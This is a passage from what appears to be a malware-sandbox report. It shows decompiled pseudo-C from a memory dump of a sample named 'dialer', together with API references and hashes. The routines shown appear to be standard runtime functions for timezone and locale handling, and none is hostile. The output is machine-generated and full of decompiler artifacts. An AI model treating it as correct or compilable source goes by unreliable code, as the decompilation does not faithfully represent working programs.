								if(_t120 == 0) {
									while( *_t178 != 0) {
										_t178 = _t178 + 1;
										_t171 = _t171 - 1;
										if(_t171 != 0) {
											continue;
										}
										break;
									}
									_pop(_t171);
									_t137 = _t137 & 0xffffff00 |  *_t178 == 0x0000002d;
									if(_t137 != 0) {
										_t178 = _t178 + 1;
									}
									_t161 = E00436079(_t159, _t178) * 0xe10;
									_v8 = _t161;
									while(1) {
										_t122 =  *_t178;
										if(_t122 != 0x2b && (_t122 < 0x30 || _t122 > 0x39)) {
											break;
										}
										_t178 = _t178 + 1;
									}
									__eflags =  *_t178 - 0x3a;
									if( *_t178 == 0x3a) {
										_t178 = _t178 + 1;
										_t161 = _v8 + E00436079(_t161, _t178) * 0x3c;
										_v8 = _t161;
										while(1) {
											_t132 =  *_t178;
											__eflags = _t132 - 0x30;
											if(_t132 < 0x30) {
												break;
											}
											__eflags = _t132 - 0x39;
											if(_t132 <= 0x39) {
												_t178 = _t178 + 1;
												__eflags = _t178;
												continue;
											}
											break;
										}
										__eflags =  *_t178 - 0x3a;
										if( *_t178 == 0x3a) {
											_t178 = _t178 + 1;
											_t161 = _v8 + E00436079(_t161, _t178);
											_v8 = _t161;
											while(1) {
												_t134 =  *_t178;
												__eflags = _t134 - 0x30;
												if(_t134 < 0x30) {
													goto L38;
												}
												__eflags = _t134 - 0x39;
												if(_t134 <= 0x39) {
													_t178 = _t178 + 1;
													__eflags = _t178;
													continue;
												}
												goto L38;
											}
										}
									}
									L38:
									__eflags = _t137;
									if(_t137 != 0) {
										_v8 = _t161;
									}
									__eflags =  *_t178;
									_t124 = 0 |  *_t178 != 0x00000000;
									_v16 = _t124;
									__eflags = _t124;
									_t125 = _v12;
									if(_t124 == 0) {
										_t29 = _t125 + 4; // 0xfffffddd
										 *((char*)( *_t29)) = 0;
										L44:
										 *(E00441545()) = _v8;
										_t128 = E00441539();
										 *_t128 = _v16;
										return _t128;
									}
									_push(3);
									_t28 = _t125 + 4; // 0xfffffddd
									_t129 = E0044C479(_t161,  *_t28, 0x40, _t178);
									_t193 = _t193 + 0x10;
									__eflags = _t129;
									if(_t129 == 0) {
										goto L44;
									}
								}
							}
							goto L46;
						}
					} else {
						_t166 = _t168;
						_t135 = _t178;
						while(1) {
							_t140 =  *_t135;
							if(_t140 !=  *_t166) {
								break;
							}
							if(_t140 == 0) {
								L8:
								_t116 = 0;
							} else {
								_t9 = _t135 + 1; // 0xdde805eb
								_t141 =  *_t9;
								if(_t141 !=  *((intOrPtr*)(_t166 + 1))) {
									break;
								} else {
									_t135 = _t135 + 2;
									_t166 = _t166 + 2;
									if(_t141 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							if(_t116 == 0) {
								L45:
								return _t116;
							} else {
								_t137 = _v12;
								goto L12;
							}
							goto L82;
						}
						asm("sbb eax, eax");
						_t116 = _t135 | 0x00000001;
						__eflags = _t116;
						goto L10;
					}
				}
				L82:
			}

APIs

_free.LIBCMT ref: 0044198E
_free.LIBCMT ref: 004419B2
_free.LIBCMT ref: 00441B39
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045912C), ref: 00441B4B
WideCharToMultiByte.KERNEL32(00000000,00000000,0046B754,000000FF,00000000,0000003F,00000000,?,?), ref: 00441BC3
WideCharToMultiByte.KERNEL32(00000000,00000000,0046B7A8,000000FF,?,0000003F,00000000,?), ref: 00441BF0
_free.LIBCMT ref: 00441D05

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: 122cb5b7360bd66e5ca6bc6a22e3fe7cd2d82cee20dbff4bc8e5ffd411c2e10e
Instruction ID: 27a0a09a5c018c0c883660709ccb2a601b23158d2266427735da08219fe15e6e
Opcode Fuzzy Hash: 122cb5b7360bd66e5ca6bc6a22e3fe7cd2d82cee20dbff4bc8e5ffd411c2e10e
Instruction Fuzzy Hash: 68C14A71900249AFEB209F69DC41AAA7BB8EF85314F1441AFE481E7261EB388DC1C758

Uniqueness

Uniqueness Score: -1.00%

Function 00447855, Relevance: 10.7, APIs: 7, Instructions: 204
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00447855(void* __edx, char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t53;
				void _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				signed int _t64;
				char _t92;
				char _t100;
				void* _t101;
				signed int _t104;
				void* _t107;
				void* _t121;
				char* _t123;
				signed int _t127;
				intOrPtr* _t132;
				void* _t133;
				intOrPtr* _t134;
				signed int _t135;
				signed int _t136;
				signed int _t137;
				signed int _t138;
				char* _t139;

				_t121 = __edx;
				_t100 = _a4;
				_v28 = _t100;
				_v24 = 0;
				if( *((intOrPtr*)(_t100 + 0xb0)) != 0 ||  *((intOrPtr*)(_t100 + 0xac)) != 0) {
					_v16 = 1;
					_t53 = E0043DFD9(_t101, 1, 0x50);
					_v8 = _t53;
					if(_t53 != 0) {
						_t104 = 0x14;
						memcpy(_t53,  *(_t100 + 0x88), _t104 << 2);
						_t132 = E0043E61D(0, 4);
						_t127 = 0;
						_v12 = _t132;
						L0043EE85(0);
						_pop(_t107);
						if(_t132 != 0) {
							 *_t132 = 0;
							if( *((intOrPtr*)(_t100 + 0xb0)) == 0) {
								_t133 = _v8;
								_t57 =  *0x46a188; // 0x46a180
								 *_t133 = _t57;
								_t58 =  *0x46a18c; // 0x46b64c
								 *((intOrPtr*)(_t133 + 4)) = _t58;
								_t59 =  *0x46a190; // 0x46b64c
								 *((intOrPtr*)(_t133 + 8)) = _t59;
								_t60 =  *0x46a1b8; // 0x46a184
								 *((intOrPtr*)(_t133 + 0x30)) = _t60;
								_t61 =  *0x46a1bc; // 0x46b650
								 *((intOrPtr*)(_t133 + 0x34)) = _t61;
								L19:
								 *_v12 = 1;
								if(_t127 != 0) {
									 *_t127 = 1;
								}
								goto L21;
							}
							_t134 = E0043E61D(_t107, 4);
							_v20 = _t134;
							L0043EE85(0);
							if(_t134 == 0) {
								L11:
								L0043EE85(_v8);
								L0043EE85(_v12);
								return _v16;
							}
							 *_t134 = 0;
							_t128 =  *((intOrPtr*)(_t100 + 0xb0));
							_t135 = E0044A26E(_t100, _t121,  *((intOrPtr*)(_t100 + 0xb0)), _t134,  &_v28, 1,  *((intOrPtr*)(_t100 + 0xb0)), 0xe, _v8);
							_t136 = _t135 | E0044A26E(_t100, _t121,  *((intOrPtr*)(_t100 + 0xb0)), _t135,  &_v28, 1, _t128, 0xf, _v8 + 4);
							_v16 = _v8 + 8;
							_t137 = _t136 | E0044A26E(_t100, _t121, _t128, _t136,  &_v28, 1, _t128, 0x10, _v8 + 8);
							_t138 = _t137 | E0044A26E(_t100, _t121, _t128, _t137,  &_v28, 2, _t128, 0xe, _v8 + 0x30);
							if((E0044A26E(_t100, _t121, _t128, _t138,  &_v28, 2, _t128, 0xf, _v8 + 0x34) | _t138) == 0) {
								_t123 =  *_v16;
								while( *_t123 != 0) {
									_t92 =  *_t123;
									if(_t92 < 0x30 || _t92 > 0x39) {
										if(_t92 != 0x3b) {
											goto L16;
										}
										_t139 = _t123;
										do {
											 *_t139 =  *((intOrPtr*)(_t139 + 1));
											_t139 = _t139 + 1;
										} while ( *_t139 != 0);
									} else {
										 *_t123 = _t92 - 0x30;
										L16:
										_t123 = _t123 + 1;
									}
								}
								_t127 = _v20;
								_t133 = _v8;
								goto L19;
							}
							E004477EC(_v8);
							_v16 = _v16 | 0xffffffff;
							goto L11;
						}
						L0043EE85(_v8);
						return 1;
					}
					return 1;
				} else {
					_t127 = 0;
					_v12 = 0;
					_t133 = 0x46a188;
					L21:
					_t64 =  *(_t100 + 0x80);
					if(_t64 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t100 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t64 | 0xffffffff) == 0) {
							L0043EE85( *((intOrPtr*)(_t100 + 0x7c)));
							L0043EE85( *(_t100 + 0x88));
						}
					}
					 *((intOrPtr*)(_t100 + 0x7c)) = _v12;
					 *(_t100 + 0x80) = _t127;
					 *(_t100 + 0x88) = _t133;
					return 0;
				}
			}

APIs

_free.LIBCMT ref: 004478C4
_free.LIBCMT ref: 004478D2
_free.LIBCMT ref: 00447A00
_free.LIBCMT ref: 00447A0B

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 708c653c710690d3d52136e1d376fa52e1ae86fb0ed252e6d5dbbb401a38c9b4
Instruction ID: 4a395575b819a6d294d3ee7acebf23b8f9ee550dc3552f8ac4883c6f511beba5
Opcode Fuzzy Hash: 708c653c710690d3d52136e1d376fa52e1ae86fb0ed252e6d5dbbb401a38c9b4
Instruction Fuzzy Hash: 7361F371904205AFEB20DF65C842B9EBBF4EF49710F14016BE954EB381E7749D42CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0043D1E1, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E0043D1E1(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int _v56;
				char _v276;
				short _v278;
				short _v280;
				char _v448;
				signed int _v452;
				signed int _v456;
				short _v458;
				intOrPtr _v460;
				intOrPtr _v464;
				signed int _v468;
				signed int _v472;
				intOrPtr _v508;
				char _v536;
				signed int _v540;
				intOrPtr _v544;
				signed int _v556;
				char _v708;
				signed int _v712;
				signed int _v716;
				short _v718;
				signed int* _v720;
				signed int _v724;
				signed int _v728;
				signed int _v732;
				signed int* _v736;
				signed int _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				char _v820;
				char _v1248;
				char _v1256;
				intOrPtr _v1276;
				signed int _v1292;
				signed int _t241;
				void* _t244;
				signed int _t247;
				signed int _t249;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				signed int _t261;
				signed int _t263;
				void* _t265;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int _t270;
				signed int _t273;
				signed int _t280;
				signed int _t281;
				signed int _t282;
				intOrPtr _t283;
				signed int _t286;
				signed int _t290;
				signed int _t291;
				intOrPtr _t293;
				signed int _t296;
				signed int _t297;
				signed int _t299;
				signed int _t319;
				signed int _t320;
				signed int _t323;
				signed int _t328;
				void* _t330;
				signed int _t332;
				void* _t333;
				intOrPtr _t334;
				signed int _t339;
				signed int _t340;
				intOrPtr* _t343;
				signed int _t357;
				signed int _t359;
				signed int _t361;
				intOrPtr* _t362;
				signed int _t364;
				signed int _t370;
				intOrPtr* _t374;
				intOrPtr* _t377;
				void* _t380;
				intOrPtr* _t381;
				intOrPtr* _t382;
				signed int _t393;
				signed int _t396;
				intOrPtr* _t397;
				signed int _t399;
				signed int* _t403;
				intOrPtr* _t410;
				intOrPtr* _t411;
				signed int _t421;
				short _t422;
				void* _t424;
				signed int _t425;
				signed int _t427;
				intOrPtr _t428;
				signed int _t431;
				intOrPtr _t432;
				signed int _t434;
				signed int _t437;
				intOrPtr _t443;
				signed int _t444;
				signed int _t446;
				signed int _t447;
				signed int _t450;
				signed int _t452;
				signed int _t456;
				signed int* _t457;
				intOrPtr* _t458;
				short _t459;
				void* _t461;
				signed int _t463;
				signed int _t465;
				void* _t467;
				void* _t468;
				void* _t470;
				signed int _t471;
				void* _t472;
				void* _t474;
				signed int _t475;
				void* _t477;
				void* _t479;
				intOrPtr _t491;

				_t420 = __edx;
				_t461 = _t467;
				_t468 = _t467 - 0xc;
				_push(__ebx);
				_push(__esi);
				_v12 = 1;
				_t357 = E0043E61D(__ecx, 0x6a6);
				_t240 = 0;
				_pop(_t370);
				if(_t357 == 0) {
					L20:
					return _t240;
				} else {
					_push(__edi);
					_t2 = _t357 + 4; // 0x4
					_t427 = _t2;
					 *_t427 = 0;
					 *_t357 = 1;
					_t443 = _a4;
					_t4 = _t443 + 0x30; // 0x43c9e0
					_t241 = _t4;
					_push( *_t241);
					_v16 = _t241;
					_push(0x457488);
					_push( *0x457344);
					E0043D120(_t357, _t370, __edx, _t427, _t443, _t427, 0x351, 3);
					_t470 = _t468 + 0x18;
					_v8 = 0x457344;
					while(1) {
						L2:
						_t244 = L00446DB7(_t427, 0x351, ";");
						_t471 = _t470 + 0xc;
						if(_t244 != 0) {
							break;
						} else {
							_t8 = _v16 + 0x10; // 0x10
							_t410 = _t8;
							_t339 =  *_v16;
							_v16 = _t410;
							_t411 =  *_t410;
							goto L4;
						}
						while(1) {
							L4:
							_t420 =  *_t339;
							if(_t420 !=  *_t411) {
								break;
							}
							if(_t420 == 0) {
								L8:
								_t340 = 0;
							} else {
								_t420 =  *((intOrPtr*)(_t339 + 2));
								if(_t420 !=  *((intOrPtr*)(_t411 + 2))) {
									break;
								} else {
									_t339 = _t339 + 4;
									_t411 = _t411 + 4;
									if(_t420 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							asm("sbb eax, eax");
							_t370 = _v8 + 0xc;
							_v8 = _t370;
							_v12 = _v12 &  !( ~_t340);
							_t343 = _v16;
							_v16 = _t343;
							_push( *_t343);
							_push(0x457488);
							_push( *_t370);
							E0043D120(_t357, _t370, _t420, _t427, _t443, _t427, 0x351, 3);
							_t470 = _t471 + 0x18;
							if(_v8 < 0x457374) {
								goto L2;
							} else {
								if(_v12 != 0) {
									L0043EE85(_t357);
									_t31 = _t443 + 0x28; // 0x30ff068b
									_t434 = _t427 | 0xffffffff;
									__eflags =  *_t31;
									if(__eflags != 0) {
										asm("lock xadd [ecx], eax");
										if(__eflags == 0) {
											_t32 = _t443 + 0x28; // 0x30ff068b
											L0043EE85( *_t32);
										}
									}
									_t33 = _t443 + 0x24; // 0x30ff0c46
									__eflags =  *_t33;
									if( *_t33 != 0) {
										asm("lock xadd [eax], edi");
										__eflags = _t434 == 1;
										if(_t434 == 1) {
											_t34 = _t443 + 0x24; // 0x30ff0c46
											L0043EE85( *_t34);
										}
									}
									 *(_t443 + 0x24) = 0;
									 *(_t443 + 0x1c) = 0;
									 *(_t443 + 0x28) = 0;
									 *((intOrPtr*)(_t443 + 0x20)) = 0;
									_t39 = _t443 + 0x40; // 0x10468b00
									_t240 =  *_t39;
								} else {
									_t20 = _t443 + 0x28; // 0x30ff068b
									_t437 = _t427 | 0xffffffff;
									_t491 =  *_t20;
									if(_t491 != 0) {
										asm("lock xadd [ecx], eax");
										if(_t491 == 0) {
											_t21 = _t443 + 0x28; // 0x30ff068b
											L0043EE85( *_t21);
										}
									}
									_t22 = _t443 + 0x24; // 0x30ff0c46
									if( *_t22 != 0) {
										asm("lock xadd [eax], edi");
										if(_t437 == 1) {
											_t23 = _t443 + 0x24; // 0x30ff0c46
											L0043EE85( *_t23);
										}
									}
									 *(_t443 + 0x24) =  *(_t443 + 0x24) & 0x00000000;
									_t26 = _t357 + 4; // 0x4
									_t240 = _t26;
									 *(_t443 + 0x1c) =  *(_t443 + 0x1c) & 0x00000000;
									 *(_t443 + 0x28) = _t357;
									 *((intOrPtr*)(_t443 + 0x20)) = _t240;
								}
								goto L20;
							}
							goto L130;
						}
						asm("sbb eax, eax");
						_t340 = _t339 | 0x00000001;
						__eflags = _t340;
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E0043629A();
					asm("int3");
					_push(_t461);
					_t463 = _t471;
					_t472 = _t471 - 0x1d0;
					_t247 =  *0x46a00c; // 0x3dad585e
					_v56 = _t247 ^ _t463;
					_t249 = _v40;
					_push(_t357);
					_push(_t443);
					_t444 = _v36;
					_push(_t427);
					_t428 = _v44;
					_v508 = _t428;
					__eflags = _t249;
					if(_t249 == 0) {
						_v456 = 1;
						_v468 = 0;
						_t359 = 0;
						_v452 = 0;
						__eflags = _t444;
						if(__eflags == 0) {
							L79:
							E0043D1E1(_t359, _t370, _t420, _t428, _t444, __eflags, _t428);
							goto L80;
						} else {
							__eflags =  *_t444 - 0x4c;
							if( *_t444 != 0x4c) {
								L58:
								_push(0);
								_t255 = L0043CDA9(_t359, _t420, _t428, _t444, _t444,  &_v276, 0x83,  &_v448, 0x55);
								_t474 = _t472 + 0x18;
								__eflags = _t255;
								if(_t255 != 0) {
									_t370 = 0;
									__eflags = 0;
									_t76 = _t428 + 0x20; // 0x43c9d0
									_t421 = _t76;
									_t446 = 0;
									_v452 = _t421;
									do {
										__eflags = _t446;
										if(_t446 == 0) {
											L73:
											_t256 = _v456;
										} else {
											_t374 =  *_t421;
											_t257 =  &_v276;
											while(1) {
												__eflags =  *_t257 -  *_t374;
												_t428 = _v464;
												if( *_t257 !=  *_t374) {
													break;
												}
												__eflags =  *_t257;
												if( *_t257 == 0) {
													L66:
													_t370 = 0;
													_t258 = 0;
												} else {
													_t422 =  *((intOrPtr*)(_t257 + 2));
													__eflags = _t422 -  *((intOrPtr*)(_t374 + 2));
													_v458 = _t422;
													_t421 = _v452;
													if(_t422 !=  *((intOrPtr*)(_t374 + 2))) {
														break;
													} else {
														_t257 = _t257 + 4;
														_t374 = _t374 + 4;
														__eflags = _v458;
														if(_v458 != 0) {
															continue;
														} else {
															goto L66;
														}
													}
												}
												L68:
												__eflags = _t258;
												if(_t258 == 0) {
													_t359 = _t359 + 1;
													__eflags = _t359;
													goto L73;
												} else {
													_t259 =  &_v276;
													_push(_t259);
													_push(_t446);
													_push(_t428);
													L83();
													_t421 = _v452;
													_t474 = _t474 + 0xc;
													__eflags = _t259;
													if(_t259 == 0) {
														_t370 = 0;
														_t256 = 0;
														_v456 = 0;
													} else {
														_t359 = _t359 + 1;
														_t370 = 0;
														goto L73;
													}
												}
												goto L74;
											}
											asm("sbb eax, eax");
											_t258 = _t257 | 0x00000001;
											_t370 = 0;
											__eflags = 0;
											goto L68;
										}
										L74:
										_t446 = _t446 + 1;
										_t421 = _t421 + 0x10;
										_v452 = _t421;
										__eflags = _t446 - 5;
									} while (_t446 <= 5);
									__eflags = _t256;
									if(__eflags != 0) {
										goto L79;
									} else {
										__eflags = _t359;
										goto L77;
									}
								}
								goto L80;
							} else {
								__eflags =  *(_t444 + 2) - 0x43;
								if( *(_t444 + 2) != 0x43) {
									goto L58;
								} else {
									__eflags =  *((short*)(_t444 + 4)) - 0x5f;
									if( *((short*)(_t444 + 4)) != 0x5f) {
										goto L58;
									} else {
										while(1) {
											_t261 = L00447F17(_t444, 0x457480);
											_t361 = _t261;
											_v472 = _t361;
											_pop(_t376);
											__eflags = _t361;
											if(_t361 == 0) {
												break;
											}
											_t263 = _t261 - _t444;
											__eflags = _t263;
											_v456 = _t263 >> 1;
											if(_t263 == 0) {
												break;
											} else {
												_t265 = 0x3b;
												__eflags =  *_t361 - _t265;
												if( *_t361 == _t265) {
													break;
												} else {
													_t431 = _v456;
													_t362 = 0x457344;
													_v460 = 1;
													do {
														_t266 = L00447EDD( *_t362, _t444, _t431);
														_t472 = _t472 + 0xc;
														__eflags = _t266;
														if(_t266 != 0) {
															goto L45;
														} else {
															_t377 =  *_t362;
															_t420 = _t377 + 2;
															do {
																_t334 =  *_t377;
																_t377 = _t377 + 2;
																__eflags = _t334 - _v468;
															} while (_t334 != _v468);
															_t376 = _t377 - _t420 >> 1;
															__eflags = _t431 - _t377 - _t420 >> 1;
															if(_t431 != _t377 - _t420 >> 1) {
																goto L45;
															}
														}
														break;
														L45:
														_v460 = _v460 + 1;
														_t362 = _t362 + 0xc;
														__eflags = _t362 - 0x457374;
													} while (_t362 <= 0x457374);
													_t359 = _v472 + 2;
													_t267 = L00447E8D(_t376, _t359, ";");
													_t428 = _v464;
													_t447 = _t267;
													_pop(_t380);
													__eflags = _t447;
													if(_t447 != 0) {
														L48:
														__eflags = _v460 - 5;
														if(_v460 > 5) {
															_t268 = _v452;
															goto L54;
														} else {
															_push(_t447);
															_t270 = L00446EF9(_t380,  &_v276, 0x83, _t359);
															_t475 = _t472 + 0x10;
															__eflags = _t270;
															if(_t270 != 0) {
																L82:
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																E0043629A();
																asm("int3");
																_push(_t463);
																_t465 = _t475;
																_t273 =  *0x46a00c; // 0x3dad585e
																_v556 = _t273 ^ _t465;
																_push(_t359);
																_t364 = _v540;
																_push(_t447);
																_push(_t428);
																_t432 = _v544;
																_v1292 = _t364;
																_v1276 = E00440972(_t364, _t380, _t420) + 0x278;
																_push( &_v1256);
																_t280 = L0043CDA9(_t364, _t420, _t432, _v536, _v536,  &_v820, 0x83,  &_v1248, 0x55);
																_t477 = _t475 - 0x2e4 + 0x18;
																__eflags = _t280;
																if(_t280 != 0) {
																	_t101 = _t364 + 2; // 0x6
																	_t450 = _t101 << 4;
																	__eflags = _t450;
																	_t281 =  &_v280;
																	_v724 = _t450;
																	_t381 =  *((intOrPtr*)(_t450 + _t432));
																	while(1) {
																		_v712 = _v712 & 0x00000000;
																		__eflags =  *_t281 -  *_t381;
																		_t452 = _v724;
																		if( *_t281 !=  *_t381) {
																			break;
																		}
																		__eflags =  *_t281;
																		if( *_t281 == 0) {
																			L91:
																			_t282 = _v712;
																		} else {
																			_t459 =  *((intOrPtr*)(_t281 + 2));
																			__eflags = _t459 -  *((intOrPtr*)(_t381 + 2));
																			_v718 = _t459;
																			_t452 = _v724;
																			if(_t459 !=  *((intOrPtr*)(_t381 + 2))) {
																				break;
																			} else {
																				_t281 = _t281 + 4;
																				_t381 = _t381 + 4;
																				__eflags = _v718;
																				if(_v718 != 0) {
																					continue;
																				} else {
																					goto L91;
																				}
																			}
																		}
																		L93:
																		__eflags = _t282;
																		if(_t282 != 0) {
																			_t382 =  &_v280;
																			_t424 = _t382 + 2;
																			do {
																				_t283 =  *_t382;
																				_t382 = _t382 + 2;
																				__eflags = _t283 - _v712;
																			} while (_t283 != _v712);
																			_v728 = (_t382 - _t424 >> 1) + 1;
																			_t286 = E0043E61D(_t382 - _t424 >> 1, 4 + ((_t382 - _t424 >> 1) + 1) * 2);
																			_v740 = _t286;
																			__eflags = _t286;
																			if(_t286 == 0) {
																				goto L84;
																			} else {
																				_v732 =  *((intOrPtr*)(_t452 + _t432));
																				_t125 = _t364 * 4; // 0xb86e
																				_v744 =  *((intOrPtr*)(_t432 + _t125 + 0xa0));
																				_t128 = _t432 + 8; // 0x8b56ff8b
																				_v748 =  *_t128;
																				_t391 =  &_v280;
																				_v720 = _t286 + 4;
																				_t290 = E00440264(_t286 + 4, _v728,  &_v280);
																				_t479 = _t477 + 0xc;
																				__eflags = _t290;
																				if(_t290 != 0) {
																					_t291 = _v712;
																					_push(_t291);
																					_push(_t291);
																					_push(_t291);
																					_push(_t291);
																					_push(_t291);
																					E0043629A();
																					asm("int3");
																					_t293 =  *0x46b508; // 0x0
																					return _t293;
																				} else {
																					__eflags = _v280 - 0x43;
																					 *((intOrPtr*)(_t452 + _t432)) = _v720;
																					if(_v280 != 0x43) {
																						L102:
																						_t296 = E0043CAB6(_t364, _t391, _t432,  &_v708);
																						_t393 = _v712;
																						 *(_t432 + 0xa0 + _t364 * 4) = _t296;
																					} else {
																						__eflags = _v278;
																						if(_v278 != 0) {
																							goto L102;
																						} else {
																							_t393 = _v712;
																							 *(_t432 + 0xa0 + _t364 * 4) = _t393;
																						}
																					}
																					__eflags = _t364 - 2;
																					if(_t364 != 2) {
																						__eflags = _t364 - 1;
																						if(_t364 != 1) {
																							__eflags = _t364 - 5;
																							if(_t364 == 5) {
																								 *((intOrPtr*)(_t432 + 0x14)) = _v716;
																							}
																						} else {
																							 *((intOrPtr*)(_t432 + 0x10)) = _v716;
																						}
																					} else {
																						_t457 = _v736;
																						_t425 = _t393;
																						_t403 = _t457;
																						 *(_t432 + 8) = _v716;
																						_v720 = _t457;
																						_v728 = _t457[8];
																						_v716 = _t457[9];
																						while(1) {
																							_t154 = _t432 + 8; // 0x8b56ff8b
																							__eflags =  *_t154 -  *_t403;
																							if( *_t154 ==  *_t403) {
																								break;
																							}
																							_t458 = _v720;
																							_t425 = _t425 + 1;
																							_t328 =  *_t403;
																							 *_t458 = _v728;
																							_v716 = _t403[1];
																							_t403 = _t458 + 8;
																							 *((intOrPtr*)(_t458 + 4)) = _v716;
																							_t364 = _v752;
																							_t457 = _v736;
																							_v728 = _t328;
																							_v720 = _t403;
																							__eflags = _t425 - 5;
																							if(_t425 < 5) {
																								continue;
																							} else {
																							}
																							L110:
																							__eflags = _t425 - 5;
																							if(__eflags == 0) {
																								_t178 = _t432 + 8; // 0x8b56ff8b
																								_t319 = L00447F5C(_t364, _t425, _t432, _t457, __eflags, _v712, 1, 0x457400, 0x7f,  &_v536,  *_t178, 1);
																								_t479 = _t479 + 0x1c;
																								__eflags = _t319;
																								_t320 = _v712;
																								if(_t319 == 0) {
																									_t457[1] = _t320;
																								} else {
																									do {
																										 *(_t465 + _t320 * 2 - 0x20c) =  *(_t465 + _t320 * 2 - 0x20c) & 0x000001ff;
																										_t320 = _t320 + 1;
																										__eflags = _t320 - 0x7f;
																									} while (_t320 < 0x7f);
																									_t323 = E004330D1( &_v536,  *0x46a170, 0xfe);
																									_t479 = _t479 + 0xc;
																									__eflags = _t323;
																									_t457[1] = 0 | _t323 == 0x00000000;
																								}
																								_t193 = _t432 + 8; // 0x8b56ff8b
																								 *_t457 =  *_t193;
																							}
																							 *(_t432 + 0x18) = _t457[1];
																							goto L121;
																						}
																						__eflags = _t425;
																						if(_t425 != 0) {
																							 *_t457 =  *(_t457 + _t425 * 8);
																							_t457[1] =  *(_t457 + 4 + _t425 * 8);
																							 *(_t457 + _t425 * 8) = _v728;
																							 *(_t457 + 4 + _t425 * 8) = _v716;
																						}
																						goto L110;
																					}
																					L121:
																					_t297 = _t364 * 0xc;
																					_t200 = _t297 + 0x457340; // 0x40e12c
																					 *0x45346c(_t432);
																					_t299 =  *((intOrPtr*)( *_t200))();
																					_t396 = _v732;
																					__eflags = _t299;
																					if(_t299 == 0) {
																						__eflags = _t396 - 0x46a2a8;
																						if(_t396 != 0x46a2a8) {
																							_t456 = _t364 + _t364;
																							__eflags = _t456;
																							asm("lock xadd [eax], ecx");
																							if(_t456 != 0) {
																								goto L126;
																							} else {
																								_t218 = _t456 * 8; // 0x30ff068b
																								L0043EE85( *((intOrPtr*)(_t432 + _t218 + 0x28)));
																								_t221 = _t456 * 8; // 0x30ff0c46
																								L0043EE85( *((intOrPtr*)(_t432 + _t221 + 0x24)));
																								_t224 = _t364 * 4; // 0xb86e
																								L0043EE85( *((intOrPtr*)(_t432 + _t224 + 0xa0)));
																								_t399 = _v712;
																								 *((intOrPtr*)(_v724 + _t432)) = _t399;
																								 *(_t432 + 0xa0 + _t364 * 4) = _t399;
																							}
																						}
																						_t397 = _v740;
																						 *_t397 = 1;
																						 *((intOrPtr*)(_t432 + 0x28 + (_t364 + _t364) * 8)) = _t397;
																					} else {
																						 *(_v724 + _t432) = _t396;
																						_t205 = _t364 * 4; // 0xb86e
																						L0043EE85( *((intOrPtr*)(_t432 + _t205 + 0xa0)));
																						 *(_t432 + 0xa0 + _t364 * 4) = _v744;
																						L0043EE85(_v740);
																						 *(_t432 + 8) = _v748;
																						goto L84;
																					}
																					goto L85;
																				}
																			}
																		} else {
																			goto L85;
																		}
																		goto L130;
																	}
																	asm("sbb eax, eax");
																	_t282 = _t281 | 0x00000001;
																	__eflags = _t282;
																	goto L93;
																} else {
																	L84:
																	__eflags = 0;
																	L85:
																	__eflags = _v16 ^ _t465;
																	return E0042F61B(_v16 ^ _t465);
																}
															} else {
																_t330 = _t447 + _t447;
																__eflags = _t330 - 0x106;
																if(_t330 >= 0x106) {
																	E0042F74F();
																	goto L82;
																} else {
																	 *((short*)(_t463 + _t330 - 0x10c)) = 0;
																	_t332 =  &_v276;
																	_push(_t332);
																	_push(_v460);
																	_push(_t428);
																	L83();
																	_t472 = _t475 + 0xc;
																	__eflags = _t332;
																	_t268 = _v452;
																	if(_t332 != 0) {
																		_t268 = _t268 + 1;
																		_v452 = _t268;
																	}
																	L54:
																	_t444 = _t359 + _t447 * 2;
																	_t370 = 0;
																	__eflags =  *_t444;
																	if( *_t444 == 0) {
																		L56:
																		__eflags = _t268;
																		L77:
																		if(__eflags != 0) {
																			goto L79;
																		} else {
																		}
																		goto L80;
																	} else {
																		_t444 = _t444 + 2;
																		__eflags =  *_t444;
																		if( *_t444 != 0) {
																			continue;
																		} else {
																			goto L56;
																		}
																	}
																}
															}
														}
													} else {
														_t333 = 0x3b;
														__eflags =  *_t359 - _t333;
														if( *_t359 != _t333) {
															break;
														} else {
															goto L48;
														}
													}
												}
											}
											goto L130;
										}
										goto L80;
									}
								}
							}
						}
					} else {
						__eflags = _t444;
						if(_t444 != 0) {
							_push(_t444);
							_push(_t249);
							_push(_t428);
							L83();
						}
						L80:
						__eflags = _v12 ^ _t463;
						return E0042F61B(_v12 ^ _t463);
					}
				}
				L130:
			}

APIs

